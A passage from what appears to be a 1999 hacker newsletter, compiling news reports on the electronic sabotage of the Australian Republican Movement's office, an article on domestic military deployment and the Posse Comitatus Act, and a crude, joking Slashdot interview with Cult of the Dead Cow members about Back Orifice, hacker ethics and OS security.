      http://www.abc.net.au/news/referendum99/ref99-21oct1999-8.htm
      
      Australia News 
      http://www.news.com.au/frameset.htm?/news_content/breaking_content/91021no.htm
      
      Sydney Morning Herald;
      
      Police on track of the 'mad hacker'

      By STEPHANIE PEATLING

      A computer hacker threw the national headquarters of the Australian 
      Republican Movement into chaos yesterday after sending an intimidatory fax 
      and shutting down its phone and Internet lines.

      Police are investigating.

      A 20-page fax threatening the 200 staff and supporters of the ARM listed 
      on its Web site was sent to the Park Street office at 7.10am. "You ain't 
      seen nothing yet," it concluded.

      The fax was sent by a group calling itself the Australian Underground and 
      the Empire Loyalist Movement. 

      The Herald contacted the founder of the group, Mr Andrew Sanders, 
      yesterday afternoon. He denied having anything to do with the attack.

      Mr Sanders, 19, who runs an Internet and e-commerce company, said neither 
      he nor the 23 people who worked with him would have been responsible for 
      the attack.

      "We are against the republic and I will uphold freedom of speech to the 
      day I die, but we would never go that far," he said. 

      "We've got a sick sense of humour, but threatening people and damaging 
      equipment is not something we are into."

      About 20 minutes after the fax was received at the ARM's office its 
      national telephone call centre was disabled, e-mail facilities were 
      jammed, and the office's computer system was shut down.

      "We have declared info-war upon you," the fax read. 

      "Look around you, see all the electronic equipment? We can control it and 
      we will. 

      "Every item in your office will be working against you. Bow down to the 
      electronic generation. 

      "God help you if we become a republic."

      A Web site referred to in the fax also asked anti-republicans to picket 
      referendum polling booths on November 6.

      Mr Sanders said he thought the attack was the work of someone seeking the 
      attention of the organisers of the Empire Loyalist Movement.

      The ARM's national campaign director, Mr Greg Barnes, said the attack was 
      "intimidatory and irrational" and called in the State and Australian 
      Federal police and Telstra to investigate.

      "No" campaigners distanced themselves from the incident.

      "The No Committee and Australians for a Constitutional Monarchy have no 
      knowledge of or connection with this group, and categorically deny any 
      involvement with the breakdown of ARM communications facilities," their 
      statement said.
      
      -=-
      
      Technology News;
      
      Hackers deny Republican attack
      From AAP
   
      22oct99
   
      AN underground computer hacking group blamed for today's sabotage
      of the Australian Republican Movement's head office has denied
      responsibility. 
   
      The group, known both as Halcon and as the Australian Underground
      and Empire Loyalist Movement, was blamed for jamming phones and
      e-mails into ARM and shutting down its computer system. 
   
      Halcon hacker "Valiant" tonight denied the group was responsible for
      the incident. 
   
      He said the sabotage was probably done by a "scriptkiddy", a young
      teenager working alone trying to get the group's attention. 
   
      "You only need a modem and a computer, a 12-year-old could do it,"
      Valiant told AAP. 
   
      "We are anti-republican, but we wouldn't take that sort of action, we
      consider that lame." 
   
      ARM was also faxed a list containing 200 names of ARM staff and
      supporters along with threats of violence. 
   
      Valiant said Halcon was Australia's oldest underground hacking group,
      formed in 1993. 
   
      He said it had 24 current members and thousands of supporters. 
      
      -=-
      
      Australian Broadcasting;
      
      Website owner denies republic
      movement sabotage

      The operator of a website named in a threatening fax to the
      Australian Republican Movement's (ARM) national office
      has denied all knowledge of electronic sabotage.

      The ARM office in Sydney lost its email capacity and most
      of its phone system after receiving a fax threatening an
      info-war.

      The fax said the Australian Underground Movement and
      the Empire Loyalist Movement would have the office's
      electronics working against the ARM. 

      It referred to the anti-republican features on a website. 

      The operator of that site says he has articles from those
      groups but the site is about telecommunications and
      freedom of speech and the call to bear arms if opposing
      the republic fails is just a pun.

      "We're generally an apathetic, intellectual organisation and
      it's a very well known organisation in Australia. But to
      whoever that was, it was very, very lame," the operator
      said.

      -=-
      
      Australia News;
      
      ARM sabotage 'appalling': No
      campaigners
      From AAP
      21oct99 
     
      3.40pm (AEST) THE sabotage of the Australian Republic Movement's
      head office was today denounced by the No campaign as appalling. 
     
      A group calling itself the Australian Underground and Empire Loyalist
      Movement today jammed phones and e-mails into ARM and shut down
      its computer system. 
     
      ARM was also faxed a list containing 200 names of ARM staff and
      supporters along with threats of violence. 
     
      No campaign convenor Kerry Jones said her organisation had nothing
      to do with the attack, and completely dissociated itself from those
      responsible. 
     
      "They are nothing to do with us, I do not know them and we have
      nothing to do with them," she said. 
     
      "I think that sort of action is appalling. 
     
      "It is not condoned by anybody that we're associated with and I hope
      that the people of Australia realise that we do not condone that sort
      of action under any circumstance." 

      @HWA
     
46.0  Military Unit Formed For Domestic Deployment 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Brian Oblivion 
      Congress is seeking a broader use of U.S. military forces
      in a domestic law enforcement role including a new unit
      for deployment in assisting civilian officers during a
      terrorist attack. This appears to be in direct violation of
      the 1878 Posse Comitatus Act, which prohibits federal
      troops from participating in domestic law enforcement
      activities. 

      "The American people should not be concerned about
      [U.S. military forces on the streets of U.S. cities]. They
      should welcome it." - Defense Secretary William Cohen 

      World Net Daily 
      http://www.worldnetdaily.com/bluesky_dougherty/19991013_xnjdo_new_milita.shtml
      
      New military unit 
      for domestic deployment 
      Cohen says Americans should 
      'welcome' troops on home soil 


      By Jon E. Dougherty
       1999 WorldNetDaily.com 

      Critics are denouncing recent congressional changes to
      the Posse Comitatus Act that will allow a broader use of
      U.S. military forces in a domestic law enforcement role
      including a new unit for deployment in assisting civilian
      officers during a terrorist attack. 

      The new command, established Oct. 7 in Norfolk, Va.,
      will be called the U.S. Joint Forces Command, and
      replaces the former U.S. Atlantic Command. At a
      ceremony commemorating the new unit, Defense
      Secretary William Cohen told participants the American
      people shouldn't fear the potential of seeing U.S. military
      forces on the streets of U.S. cities. 

      The military must "deal with the threats we are most
      likely to face," Cohen told reporters, downplaying
      concerns about troops operating on home soil. "The
      American people should not be concerned about it. They
      should welcome it." 

      The new command is designed to prepare U.S. troops to
      fight abroad or to respond if terrorists strike with nuclear,
      chemical or biological weapons. 

      In opposing the measure, critics cite the 1878 Posse
      Comitatus Act, which prohibits federal troops from
      participating in domestic law enforcement activities under
      most circumstances. With the concern over domestic
      terrorism rising since the World Trade Center bombing
      and numerous incidences of cyber-attacks on U.S.
      defense and financial institutions, the Clinton
      administration has begun to relax some of those
      restrictions. 

      In July, WorldNetDaily reported the new measures would
      end the requirement for local law agencies to reimburse
      the federal government for any local use of military
      equipment, as well as enable the Department of Defense
      to deploy military troops in cases of anticipated or actual
      terrorist attacks. 

      Then, David Kopel of the Independence Institute warned
      that the measures would, if passed, "set (bad) precedents
      for years to come." 

      Since the Waco debacle in 1993, when federal law
      officers and military personnel assaulted a church
      community resulting in the deaths of over 80 men, women
      and children, Kopel said the federal government has been
      "eroding the protections contained in the Posse Comitatus
      Act." In the past, he told WorldNetDaily, most of the
      amendments to the original law had been based on bogus
      drug issues. Now, he said, that issue seems to have
      shifted to so-called terrorist attacks, or at least the threat
      of them. 

      The Defense Department has said only the military has
      enough equipment to operate in a poisoned environment,
      or to manage a massive decontamination effort.
      Secretary Cohen told reporters last week that federal law
      will not be violated because the military would only
      respond if requested. 

      "It is subordinate to civilian control," he said. 

      But Gregory Nojeim, legislative counsel for the American
      Civil Liberties Union in Washington, D.C., told
      WorldNetDaily he is concerned about "nightmare
      scenarios" like those in the recent films, "Enemy of the
      State" and "The Siege." 

      "Soldiers are not equipped, by training or temperament, to
      enforce the laws with proper regard for civil and
      constitutional rights," he said. "They're trained to kill the
      enemy." 

      Nojeim said the ACLU is concerned about "letting loose
      the most effective fighting force in the history of the
      world" on American civilians. 

      Cohen said that the creation of the Joint Forces
      Command would better coordinate the training of the four
      armed services. However, history is replete with reasons
      why some Americans continue to be hesitant about using
           military troops in a law enforcement capacity. 

      Besides questions about the Army's Delta Force role
           during the Waco 
      siege, most recently, in 1997, U.S.
           Marines assigned to assist the 
      U.S. Border Patrol in
           combating illegal immigration accidentally 
      shot and killed
           an 18-year-old goat herder. That force has since 
      been
           withdrawn and reassigned, but lawmakers have remained
           
      committed to expanding the military's civil law
           enforcement role in 
      other ways. 

      For example, the military also has been given an
           expanded role in 
      defending against cyber-terrorism, or
           assaults on U.S. computer 
      systems. The U.S. Space
           Command in Colorado will be leading that 
      effort. 

      Nojeim questioned the need for such an expansion of
           federal military 
      forces into the domestic law enforcement
           arena, even though U.S. 
      officials have said the nation is
           now at greater risk of terrorist 
      attack. He also believes
           the White House should do a better job of 
      educating the
           American people about why the changes to the Posse
           
      Comitatus law are needed. 

      "For years the federal government has showered the FBI
           with hundreds 
      of millions of new dollars to help it combat
           crimes involving 
      chemical and biological weapons," he
           told WorldNetDaily. "Taxpayers 
      need to know where
           that money has gone and why the president now 
      wants to
           call in the troops." 

      Addressing the long-term ramifications of the change in
           military law 
      enforcement policy, Nojeim said, "When the
           crisis hits, those with 
      the biggest guns will be subordinate
           to no one." 
      
      @HWA
      
47.0  cDc Interview Posted On Slashdot 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Space Rogue 
          We don't have a URL yet but Slashdot 
      should be posting
           the results of its email interview with the Cult 
      of the
           Dead Cow sometime on Friday. Should be worth a read. 

      Slashdot       
          http://www.slashdot.org
      
      Bizzare Answers from Cult of the Dead Cow

      Posted by Roblimo on Friday October 22, @12:30PM EDT from the 
      people-mommy-warned-you-about dept. Monday's questions for the Cult of the 
      Dead Cow ranged from serious-tech to silly. Various members of the Cult 
      answered appropriately. Great stuf! One warning: if you are offended by 
      strong language or are a hacker under 18, you should not read this Q&A 
      session. The Cult is one of those groups the assorted nanny-censor 
      programs try to keep away from deity-fearing, good-citizen, mass-average 
      folks because they're commie anachist no-gooders. Or something like that 
      (and we like them that way!) Click below to learn why these people are A 
      Danger to the Established Order(tm). 

      tdsanchez asks: How has the 'mission' and/or purpose of cDc changed as the 
      years have passed, especially with the advent of pervasive internet 
      connectivity and the 'death' of classic dial-up BBS's? 

      cDc answers:

      Obscure Images answers: cDc's mission has never changed. We are still 
      primarily motivated by the desire to dominate the world. I think that if 
      anything, the growth of the internet has just been part of our plans for 
      your tomorrow. 

      G. Ratte' answers: The mission has never changed... it's always been about 
      us trying to do cool stuff. The Internet has just made it easier to 
      communicate and it's a lot less hassle than when you had to worry about 
      how fresh your long distance codes were, back in the day. Call my dead 
      BBS! Demon Roach Underground, 806/794-4362. 2400 baud! Apple II, baby! 

      Nighstalker answers: The whole point of cDc is to communicate. While 
      T-shirts and watches and BO2K are the glitz, the core of cDc is 
      communicating to and with the world. The venerable T-File is the heart and 
      soul of cDc and we will never abandon this most basic and venerable facet 
      of the telecom/computer demimonde 

      Tweety Fish answers: We are currently in the process of training our 
      massive, highly secretive ninja army. 

      M1000 asks: How would you define the implementation of security on the 
      major OS today? 

           Windows95 / 98 Commercial Unix Linux FreeBSD NT Windows 2000 (NT5) 
           etc.

      cDc answers:

      Nighstalker answers:BR> If it's from MS, the security is crap. everything 
      else is better by comparison. Linux is pretty good if you're a Linux 
      guru. Same thing with any other flavor of UNIX. But no matter how good you 
      are, there's someone out there who is better than you. 

      "The price of secure connectivity is eternal vigilance!" -- DilDog answers: 

           Windows95 / 98 - Shit happens Commercial Unix - Shit happens over 
           RPC. Linux - When shit happens, you fix it. FreeBSD - Shit would 
           happen, but there's no driver for it yet. NT - Shit wouldn't happen 
           if you'd just spend a few months performing 300+ modifications to 
           our default installation, you lazy sysadmin. Get your MCSE. Windows 
           2000 (NT5) - Shit happens over DCOM. 

      -- Tweety Fish answers: Except for Window95/98, which I would characterize 
      as sucking ass across the board, there's no simple answer to that 
      question. All of those operating systems are (resonably) securable, in 
      theory, but if you want to make the job of securing a box easier, why not 
      run OpenBSD? 

      xmedar asks: There is an episode of South Park with cows worshipping a cow 
      clock, and when it is removed by the people, the cows all jump off a 
      cliff, now I've heard that refered to as the Cult of the Dead Cow episode, 
      is it anything to do with cDc or are cults for dead cows just in fashion 
      right now? 

      cDc answers:

      Obscure Images answers: We would like to believe that we were 
      inspirational to the creators of South Park, but we will defer to the 
      obviously natural call of bovinity. -- Reid Fleming answers: Our lawyers 
      will not permit us to comment upon the episode in question. -- G. Ratte' 
      answers: Sure. I hear the next round of Calvin Klein ads will feature Kate 
      Moss munching a big greasy cheeseburger as Kari Wuhrer cleaves an axe 
      through a cow's head. And a roomful of Italian boys with no chest hair 
      look on in quiet desperation. It's a scene straight from one of our 
      industry convention parties. -- Nighstalker answers: The universe is a 
      chaotic system. If Ratte had been screwing around in a sewage treatment 
      plant, rather than an abandoned slaughterhouse, we cound have been called 
      the Cult of Recycled Shit. That the guys from South Park had cult of 
      suicidal cows may be our fault. maybe not. -- Tequila Willy answers: I know 
      this episode well, and I've spent a lot of time studying the various 
      interpretations of this episode. Though the Cult of the Dead Cow 
      interpretation is a very plausible and popular connection to make, there 
      is another very plausible interpretation that I think you will find 
      interesting. The hands on the clock are metaphors for the phallus. The 
      removal of the clock represents castration. The removal of the phallus 
      limits sexual options and limited options are bad. The cows demonstrate 
      their adherence to their principle of "maximum freedom or death" by 
      jumping off the cliff. You might ask yourself, xmedar, whether you have 
      any principles that you would be willing to die for. -- Tweety Fish 
      answers: TV writers (comedy writers especially) tend to be unrepentant 
      fanboys with computers and tight deadlines... you decide. 

      Effugas asks: To the various illustrious(translation: I've worshipped you 
      guys for the majority of my life) members of the Cult of the Dead Cow: 

      Moo. 

      That being said, I'd like to know what have been the most surprising 
      events in the computer industry for you. Anything's fair game. What just 
      came out of nowhere and knocked the Cult flat on its ass? 

      cDc answers:

      Obscure Images answers: We haven't been knocked on our asses yet by 
      anything that has happened in the computer industry. We're great at 
      believing that whatever we see is directly caused by our underground 
      efforts. We would be knocked on our ass if we didn't believe that. Oh 
      yeah, Linus Torvalds is a cDc simulacra unit. -- Reid Fleming answers: 
      www.realdoll.com www.jerkcity.com -- GA Ellsworth answers: 
      http://www2.promisekeepers.org/ -- G. Ratte' answers: I'm mostly surprised 
      by what hasn't happened. I thought floppy disks would get bigger and 
      bigger 'til they became a 3-foot square, and you'd use 'em for kites when 
      they went bad. I thought for sure bubble memory was going to take off, 
      and pen-based OSes would rule the industry, and I'd have an Amiga 
      clipboard computer running MS's BOB right now. It should have been Atari, 
      not Microsoft. -- Nighstalker answers: Cheap powerful computers. Looking at 
      the list prices of all my Commodore 128 gear shows me that the whole 
      system cost more than a new iMac. Also, PDAs are pretty surprising, how 
      they just suddenly seem to be everywhere. -- White Knight answers: What 
      surprised me most about the computer industry is how much less attractive 
      Kiki Stockhammer is in person. -- Tweety Fish answers: You know they got 
      these things now that can take a picture and put it on the screen thingy? 
      That's so cool! 

      sinatra asks: A recent article (forgot the reference) characterized codc 
      members as a bunch of social juveniles bound by no particular ideals, and 
      lacking in both trust and personal respect for other members as well as 
      the (cr|h)acker communities at-large. The evidence presented in the 
      article however was limited to on-stage behavior and a virus of 
      unknown-but-suspicious origin on a distributed CD. The codc archives 
      paint an equally murky picture, depending on the reader's perspective. 

      So is there a codc code of ethics? Could such a thing ever be enforced? 

      cDc answers:

      Obscure Images answers: I can't answer for everyone, but I will say that I 
      am a moral relativist. I think that the morality of an act is dependent 
      on the context of that action. As for a cDc as a group, we are a very 
      close knit group, very nearly a family, and to think that there would be 
      someone amongst us who would turn on us is an absurdity. The article in 
      question was written by a well known fool who would fit in better at a 
      meeting of the John Birch S ociety than a computer convention. -- Reid 
      Fleming answers: No and no. -- G. Ratte' answers: Lacking in trust and 
      personal respect? I wish I knew the article you're referring to, 'cause 
      those are some pretty strange assumptions. But that's funny, that's 
      interesting. We're the kids the newspapers used to write about being 
      diagnosed with "Pac-Man elbow." We're the kids with the sore thumbs from 
      Atari joysticks playing "Combat" through our adolescence. We're the first 
      generation to grow up hearing a modem squeal every day after school. So 
      if there's any lack of trust and respect for the (cr/h)acker community, 
      it's self-loathing and it's all in the family. Familiarity breeds 
      contempt. The only ethic is to not be, uh, k-lame. Spreading viruses is 
      not good. -- Nighstalker answers: I read that article. The author is an 
      ignorant twat. 

      For what it's worth, I trust my very life with any cDc member. I trust 
      them implicitly. 

      I suspect that cDc individually and as a group is far more ethical than 
      Microsoft. Anyone emails me, they get an answer directly from me, not 
      some flack from marketing. -- Tequila Willy answers: Dear Sinatra, Who's codc? 
      I've never heard of them. -- Tweety Fish answers: The nice thing about cDc 
      is we're all cool enough, and all moral enough, that there really is no 
      need for us to enforce much of anything. Personally, I'm constantly 
      entertained by everything every other cDc member ever does, and I'd much 
      rather have that than the 1700 page cDc Moral Guide. 

      Incidentally, the author of that article also thinks that Richard 
      Stallman should be arrested and charged with monopolistic practices, so, 
      you know, you shouldn't believe everything you read. 

      [bog-oh] asks: You folks have been around for so long, surely you've seen 
      the evolution of both terms. Are you quick to take a stand on misuse of 
      either, or do you just take it all in stride? Some of the older security 
      folks out there are damned sure that "hacking" is still purely malicious, 
      and "Cracking" simply means breaking software registrations and the like. 
      What do you feel each term represents these days? 

      cDc answers:

      Obscure Images answers: We would like to take a stand on this nonsense 
      once and for all. We are of the firm opinon that the qualification for 
      being a hacker is not something that can be stated on clear moral grounds. 
      As far as we are concerned, crackers are something you eat. -- Reid Fleming 
      answers: The term "cracker" is divisive, insulting, and should be 
          considered inappropriate in mixed company. Same 
      for "honky" and "caucasian". 

      "Hacker" on the other hand, is perfectly fine for most social situations. 
    
     A      As in: "Hey, you! Hacker! Suck my dick!" -- G. Ratte' answers: 
      Personally, 
          I never use the term "hacking"... it's all just messing 
      around to me, and 
          some of it could get you into trouble. Whatever. 
      "Cracking" means removing 
          software protection, and a "cracker" is a 
      white boy. I don't know when 
          people starting fussing over the terms 
      and using "cracking" to mean 
          system intrusions, but I think it all 
      carries the stench of 
          journalist-invented nonsense. Same with all 
      that "white/black hat" crap. 
          Nobody in this situation uses those 
      terms, and they readily identify the 
          user as an outsider. -- 
      Tequila Willy answers: Dear Bog-Oh,

      Your sensitivity is to be applauded in these times largely characterized           
      by egocentric thinking. I appreciate that you've taken the time to ask me    
          what I *feel* about these terms. I feel good about what each term           
      represents. Thank you for asking. -- Tweety Fish answers: A cracker is          
      somebody who cracks warez, and/or a pejorative term for a white person.           
      Any other meaning is never going to catch on in the media, nor with the           
      old school. It's just too complicated to remember the distinction all the     
      time. The people who are hackers by anybody's definition have done           
      some... uh... mischevious things in their time; it's part of the nature 
      of the beast. To say that "a real hacker would never break into a 
      computer system" indicates - to me - a lack of understanding of the 
      original meaning of the word. Of course a real hacker would break 
      into a computer  system, if it was an interesting enough problem and 
      they didn't anticipate anybody having a problem with it. I agree 
      that the media should widen it's definition of what a hacker is, 
      but that's not the argument I usually see, especially here on 
      slashdot. I see a lot more of "they aren't a real hacker, because 
      they break into systems and/or do security stuff", which is plain 
      silly. 

      Personally, I refer to people by whatever term they would like me to 
      use, unless I don't like them. Besides which, if you are doing something
      unexpected, unforseen, or disallowed to any system (which is my pocket 
      definition of hacking)  somebody is always going to think it's bad, 
      until you laboriously  convince them otherwise, on a case by case basis. 

      Why get caught up in semantic arguments when you could be doing cool           
      things and get noticed for THAT, instead? 

      phray01 asks: please be honest 
           (1)boxers (2)briefs (3)panties (4)thongs (5)nothing (6)orange                     
           (7)Hemos the Hamster

      cDc answers:

      Obscure Images answers: All of the above, though not necessarily at the           
      same time. -- Reid Fleming answers: sacred vestments -- GA Ellsworth 
       answers:   Boxers for me.. -- G. Ratte' answers: I refuse to answer 
      this question, as  I don't want to encourage your gross masturbatory 
      fantasies. What I choose to cover my massive, pulsating tool swinging
      handily between my taut legs is my business, and my business only. 
      What should the touch of  soft fabric brushing the tender head of my
      otherwise steely rod matter to the likes of you?  Disgusting! -- 
      Nighstalker answers: Sheer to the waist black seamed pantyhose for 
      formal affairs. -- DilDog answers: All of the above. 
      -- Tequila Willy answers: Dear phray01, 

      The etiquette in this case actually depends upon whether you were east or     
      west of the Mississippi when this unfortunate accident occurred. 
      East of the Mississippi, the gas station attendant should remove 
      the dog's head from your windshield wipers when cleaning the 
      windshield. However, please be prepared to tip for this service. 
      West of the Mississippi, it is usually considered bad manners to 
      expect gas station attendants to remove any animal bits that have 
      been wedged in your car parts. Thank you for asking. -- Tweety Fish 
      answers: I actually try not to wear any slashdot operators that 
      close to my skin. Makes my pants look funny. 

      Foogle asks: Let's face it - most people regard the cdc as a bunch of           
      script-kiddies looking for some limelight. The BackOrifice software           
      really made this worse, because it was seen, not as an admin tool, but as     
      an application meant to propogate cracking. How does this make you feel? 
      That is, what are your personal thoughts on the cult's activities and how 
      do you think they should be viewed from the professional side of the 
      industry? 

      cDc answers:

      Obscure Images answers: cDc is not a group of script kiddies. We are           
      united in our interest to hack the world, be it though computers, words,           
      images, sounds, politics, money, or sex. Those who consider us to be           
      script kiddies ought to shut the fuck up and write their own tools. Using    
      tools doesn't make someone a script kiddie, what makes a script kiddie is 
      the use of other people's tools to accomplish things they  have no 
      interest in understanding. It is understandable for  professionals to be 
      concerned with our reputations, but that is why we've been completely 
      open with our tools. We have software that  can be used as very effective 
          tools. -- Reid Fleming answers: Most professionals get it. The trojan
      horse problem was considered to be low priority a year ago. Things have
      changed as a direct result of Back Orifice and Netbus. 

      (By the way, you ever notice that sometimes journalists turn to Russ           
      Cooper for an "independent" perspective on Microsoft? And you ever notice    
      how often he agrees with the Microsoft position?) -- G. Ratte' answers: It's 
          somewhat frustrating when something a lot of effort  has gone into is 
          totally misunderstood by so many people. A lot of people seem to have an 
          aversion to the big picture and how BO fits into a larger whole. As for 
          'the industry,' . Rah rah venture  capital, rah rah IPO. "We've got this 
          great new site,  Hats4Cats.com, a brave new world of headgear for our 
          feline friends! We're seeking the perfect partners to get this off the 
          
      ground right, and if you'll just look over this media kit at your leisure    
      after the convention, we'll have someone call you in the next few days 
      about some great opportunities!" That's 'the industry.' 'The industry' can 
      kiss our collective cDc ass. -- Nighstalker answers:  Most people couldn't 
      plug in new RAM to their machines or install an application with the aid 
      of an installation wizard. More so for the people that write about the 
      digital underground who are not a part of the digital underground. 

      BO was released to show up the miserable security of Windows, in the hope 
      that MS would do something other than issue press releases and that users 
      would be made aware of the pitiful security on their machines, 
      particularly when connected to the Internet. BO2K was released in response
      to the pleas of countless IT professionals who needed a powerful admin tool.
       -- DilDog answers: I don't feel one way or the other about it. I write code
       to fill a void whenever I find I need something that doesn't 
      exist. Hence, BO2K. 

      What Linux is to Commercial Unix, BO2K is to Commercial remote admin          
      tools. I mean, what kind of sick and twisted hax0r would want to use FREE 
      and POWERFUL software without having to pay out of their ass for 
      it. --  Tequila Willy answers: Dear Foogle, Thank you for being 
      concerned about my feelings. However, I disagree with the metaphysical
      assumptions of your first question. I believe I choose how I feel and that
      the reaction of "most people" cannot make me feel any particular way. That
      being said, your second question seems more appropriate. The Cult of the 
      Dead Cow should be viewed as what they are, namely, experts in global 
      domination. -- Tweety 
      
      Fish answers: So the technical definition of Script Kiddie is one           
      who uses pre-made scripts or tools to hack sites, instead of developing           
      their own tools.. by that definition, how could we possibly be script           
      kiddies? 

      In the larger sense of BO2K being an application meant to propagate           
      cracking, yes, that might happen, but the way we're doing it does serious     
      work to raise awareness of these issues. I think we're perfectly 
      aware that this can be hard to understand, and we're perfectly 
      willing to keep hammering our message home until people start to get it,
      and start working to fix these problems. 

      An_onymous Coward asks: First of all I've got to say I think cdc is 
      pretty damn cool. I was digging their .txts since I got my first 
      dialup shell account long ago. Now, with you guys being so security 
      minded and all, there's only one question I could think of for you: 
      If you were to build your ideal network, with telnet, ssh, www, 
      ftp, pop3, smtp, file & printer sharing, bind, etc... what would be 
      your ideal configuration to maximize security? Please be specific 
      about Network OSs, routers, network policies,  protocols, 
      filesystems, permissions, daemons, firewall rules, and anything 
      else that comes to mind. 

      cDc answers:

      Reid Fleming answers: Dedicated fiber lines in a star configuration. 
      Ultra low tramissions, only a few quanta, to foil optical taps. 
      One-time pad encryption for each packet. All plaintext messages 
      composed in an alien language unknown to anyone but the 
      participants. The actual content of the messages being hidden in 
      subliminal channels too sensitive to be mentioned here. -- DilDog 
      answers: For cryin' out loud. My ideal network doesn't have half of 
      that crap running. It can all be done with DCOM and HTTP. Just 
      kidding! 

      I -know- this is a Linux crowd, but I'm tellin' ya, take a look at           
      OpenBSD for PROACTIVE security when it comes to that mission critical           
      firewall box, network monitor, webserver, etc. -- Tequila Willy answers: 
      Dear Anonymous Coward, 

      First, thank you for your compliments. However I am left wondering how           
      many of our text files you have actually read. All of your questions have     
      already been addressed in detail in our text file, Wet Mount Slide.       -- 
          Tweety Fish answers: DUD3 Y3R TRY1N T0 B3 4LL SN34KY 4N' S0C1AL 
      3N1N33R US AN' SH1T A1N'T Y000? B3TT3R US3 NM4P INST3D!@$#!@% 

      If you want a genuine answer to that question, I'm sure the l0pht would           
      be able to answer it as specifically as you need for a small fee. 
      Freshman asks: Since BO is/was a big deal, I'm wondering what kind of           
      companies have tried to contact you and what they had to say. Did           
      Microsoft ever give you guys a buzz? The DoD maybe? CIA? If so, what did          
      they have to say? 

      cDc answers:

      Tweety Fish answers: We've been in constant communication with the CIA,           
      NSA, and MOSSAD to make sure that the government-specific backdoors built     
      into BO2K meet their tough standards for EoE (Ease of Eavesdropping).. we 
      value the contributions the US and other governments have made to these 
      products, and look forward to working much much more with them in the 
      future. 

      Microsoft hates us, I think. 

      rikek asks: I've always wondered... what does a group that produces           
      "script kiddie material" (no offense intended, it's inevitable whether           
      you want it or not) feel about their work? Every now and then I'm plagued     
      by contact with an "3R33+ H@X0R", who is most likely some 14 year  old 
          without anything better to do who is causing some minor damage, 
      without a clue as to what a TCP/IP packet is. The ratio of clueful 
      hackers cracking to script kiddies cracking has gone way down over 
      the few years, and products like BO are likely to blame. So what do 
      you guys think about this... would you rather this turned around, 
      or do you feel that distributing tools to nameless masses is a good 
      method at getting back at the real evils? 

      cDc answers:

      Obscure Images answers: There will always be people who ride on the work           
      of others. That's all that script kiddies are, poseurs, trendies or what           
      have you. Back in the old days after War Games came out there were floods
      of "hackers" out there and these same comments were made. In the  end, 
      there is always a shakeout process. Most of the current script kiddies 
      will abandon their activities, leaving the hardcore still 
      in place. -- Reid 
          Fleming answers: I suggest reading the section on Evolutionarily
      Stable Strategies in The Selfish Gene. -- G. Ratte' answers: It's tricky,
      and I refuse to get into the kind of age/experience penis-size wars that 
      always come up with this "lamers are running around with dangerous scripts" 
      thing. Back Orifice is distributed the way it is to force an issue. A 
      hell of a of people should be upset their computers are wide open. 
      I've always hoped that people interested in our tools would seek out our           
      other material and read up on what we're about. And that they'd be smart           
      enough to figure out that bumming some hapless person's day by screwing 
      up their computer is not a good way to spend an afternoon. The end of all 
      our text files from the last few years says this: "Save yourself, go 
      outside, DO SOMETHING!" -- Nighstalker answers: Virtually anything can be 
      used for evil, as virtually anything can be used for good. 

      One thing about BO2K is that the author deliberatly made it more           
      difficult for clueless script kiddies to use. They're the ones who           
      constantly plague us with badly mis-spelled complaints about how BO2K           
      doesn't work. The IT professionals sing our praises about the power and           
      ease of use of BO2K. 

      BO2K is forcing evolution to accelerate in the world of computer           
      security. we regret the damage that is done with BO2K. In the long run,           
      we will all be the better for this. -- Tequila Willy answers: I think you     
      have raised an excellent question. However, I am doubtful that good     
      products like BO can be identified as the cause of the diminishing 
      number of hackers in comparison the the number of script kiddies. I 
      believe that each individual must take responsibility for the 
      character traits that they choose to cultivate in themselves. If 
      the number of script kiddies continues to grow and more individuals 
      choose to take the path of becoming a script kiddie rather than 
      pursuing hacking skills, then this seems more plausibly interpreted 
      as a sign of laziness or a short attention span on the part of 
      those who choose this path. I don't think that BO could be blamed 
      for such a result. That being said, I would prefer to see more 
      hackers than script kiddies but only because I respect the skills 
      of hackers more than the skills of script kiddies. And I would    
      rather participate in a society populated by individuals I can respect.           
      However, I believe your question should lead us to thinking more about           
      what sort of behaviors should or should not be tolerated in cyberspace.           
      And before we can address that question, it would first be helpful to           
      conduct an inquiry into the metaphysics of hacking. I believe that many           
      of the laws regarding computer security issues are misguided because they     
      make fundamental assumptions about the nature of the computer 
      hacking  environment that simply are erroneous. -- Tweety Fish 
      answers: The ratio  might have changed, but the total number of 
      people with a clue has increased, not decreased. Some 14 year old 
      might get their start by messing with bo2k at school, and then they 
      might start writing plugins, and then they might need to do something
      stranger, so they'll mod netcat to do suit their needs, and then they
      might realize how horribly insecure their own system is, and install 
      linux or freeBSD to mitigate that somewhat, and then they might get out
      of school and go get a job securing corporate networks with all the 
      knowledge they've gained. 

      Kids will be kids. If computer security was a real priority for operating     
      system vendors, Joe Random 14 year old would need a lot more than          
      something as general purpose as BO2K to start trouble. He'd need... uh... 
      a car, say, or some bleach and ammonia, or a lot of beer. 
      
      yoshi asks: What should application and OS designers do to build systems          
      which are more secure? 
      
      cDc answers:

      Reid Fleming answers: For starters, they should spend more time and energy 
      on security than UI design, documentation, or product packaging. -- 
      Nighstalker answers: Learn from the mistakes of the past and the solutions 
      of today. It's not that hard to impliment security. It's just easier for 
      lazy coders and indifferent beancounters to blow it off by saying that, 
      "This is not something our customers are demanding in our product." -- 
      Dildog answers: Proactive security measures. Encrypt everything. Eliminate 
      HTTP and go right to HTTPS everywhere. -- Tweety Fish answers: Make security           
      concerns and security audits an integral part of the development. 

      Alpha42 asks: Okay.. Here's my question.. what ever happened to Obscure           
      Images?! I haven't seen anything from him in AGES... Don't get me wrong,           
      I thought BO was good and all, and I'm sure it's generated 99% of the PR           
      lately.. but I miss the original cDc stuff.. the files! :) And Obscure?!           
      OH man... 

      cDc answers:

      Obscure Images answers: Hey, I'm still here, and I am as active as I have     
      ever been. I've never been gone, just acting back in the shadows. I  do 
      what I can to help plan and implement our projects. Most of it  comes 
      without the glory or press attention, but it has to be done for us to be 
      successful. Over the past 10 years I've gone to school, gone out into the 
      world, gotten married, and started to go a bit grey. Not related to my 
      marriage, I assure you. There will be more files from me, it's just a 
          matter of finishing them. Keep your eyes open, your mouths too. 

      As far as my poetry goes, I have an excuse. It was 10 years ago, I was a           
      typical late teen with clinical depression and the idea that I could           
      write poetry. I stand by my stories, but would rather see the poems fade           
      away like my youth. 

      Oh yeah, you have seen me, everytime you see our Paramedia Cross logo. --    
